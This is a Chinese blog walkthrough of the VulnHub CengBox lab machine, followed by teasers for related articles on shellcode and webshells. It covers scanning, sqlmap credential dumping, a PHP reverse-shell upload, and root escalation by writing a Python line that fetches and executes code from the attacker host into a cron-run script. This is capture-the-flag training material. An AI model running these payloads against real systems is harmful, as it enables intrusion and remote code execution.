vulnhub之CengBox的实践

VSole2023-07-17 09:23:02

今天实践的是vulnhub的CengBox镜像,

下载地址,https://download.vulnhub.com/cengbox/CengBox.ova,

无法用workstation导入,用virtualbox导入成功,

做地址扫描,sudo netdiscover -r 192.168.0.0/24,

获取到靶机地址192.168.0.185,

继续进行端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.185,

有web服务,进行目录暴破解,

dirb http://192.168.0.185 /usr/share/dirb/wordlists/big.txt,

继续扫描http://192.168.0.185/masteradmin目录下的php路径,

dirb http://192.168.0.185/masteradmin -X .php,

获取到http://192.168.0.185/masteradmin/login.php和

http://192.168.0.185/masteradmin/upload.php,

对http://192.168.0.185/masteradmin/login.php进行sql注入暴破,

sqlmap -u 'http://192.168.0.185/masteradmin/login.php' --forms --dbs --batch,

继续对cengbox数据库进行sql注入暴破,

sqlmap -u 'http://192.168.0.185/masteradmin/login.php' --forms -D cengbox --dump-all --batch,

获取到用户名密码,masteradmin/C3ng0v3R00T1!,

登录http://192.168.0.185/masteradmin/upload.php,

kali攻击机上准备反弹shell脚本,

cp /usr/share/webshells/php/php-reverse-shell.php php-reverse-shell.ceng,

上传后,kali攻击机上用nc开个反弹shell监听,nc -lvp 4444,

浏览器访问http://192.168.0.185/uploads/php-reverse-shell.ceng,

获取到反弹shell,查看到cengover用户,用之前获取的密码切过去,

再下载pspy64查找root权限的程序,

发现定时执行的md5check.py,

确认md5check.py是可写的,

kali攻击机上用msf做个反弹shell脚本并开启监听,

msfconsole

use exploit/multi/script/web_delivery

set LHOST 192.168.0.190

set LPORT 5555

exploit

把生成的反弹shell脚本写入md5check.py,

echo "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.0.190:8080/XH7HFK0UJNqYZ', context=ssl._create_unverified_context());exec(r.read());" > md5check.py,

等一会儿反弹shell就过来了,进入session,确认是root,

shell
本作品采用《CC 协议》,转载必须注明作者和本文链接
研究人员在TorchServe中发现多个高分漏洞,影响数万AI 服务器。
通过从事件日志中写入/读取 shellcode 来实现持久化。
shellcode loader的编写
2023-04-17 11:15:39
改变加载方式指针执行#include?参数1:分配的内存的起始地址,如果为NULL则由系统决定。参数2:分配的内存大小,以字节为单位。参数3:分配的内存类型,MEM_COMMIT表示将分配的内存立即提交给物理内存,MEM_RESERVE表示保留内存但不提交。参数4:分配的内存保护属性,PAGE_READWRITE可读可写,PAGE_EXECUTE_READ可执行可读。结构体的指针,用于指定新线程的安全属性,NULL表示默认安全属性
shellcode动态注入!
2023-01-24 10:15:10
声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大
跟第一代WebShell管理工具“菜刀”相比,冰蝎的流量是加密的,特征更不明显,能有效规避流量设备的检测。
shellcode编写探究
2022-06-09 15:34:57
前言shellcode是不依赖环境,放到任何地方都可以执行的机器码。shellcode的应用场景很多,本文不研究shellcode的具体应用,而只是研究编写一个shellcode需要掌握哪些知识。要使用字符串,需要使用字符数组。所以我们需要用到 LoadLibrary 和 GetProcAddress 这两个函数,来动态获取系统API的函数指针。
OneEDR 2.5版本让恶意Webshell“现原形”
今天脑子里面蹦出来个想法,免杀木马然后cs上线,本来想让cs与msf联动的,但是出了点小问题,还是先研究免杀火绒吧。
shell编程15例(三)
2022-03-25 07:43:19
1、统计当前 Linux 系统中可以登录计算机的账户有多少个 #!/bin/bash # 统计当前 Linux 系统中可以登录计算机的账户有多少个 #方法 1: grep "bash$" /etc/passwd | wc -l #方法 2: awk -f: '/bash$/{x++}end{print x}' /etc/passwd
shell编程15例(一)
2022-03-23 07:53:04
1、编写hello world脚本 #!/bin/bash # 编写hello world脚本 echo "Hello World!" 2、通过位置变量创建 Linux 系统账户及密码 #!/bin/bash # 通过位置变量创建 Linux 系统账户及密码
VSole
网络安全专家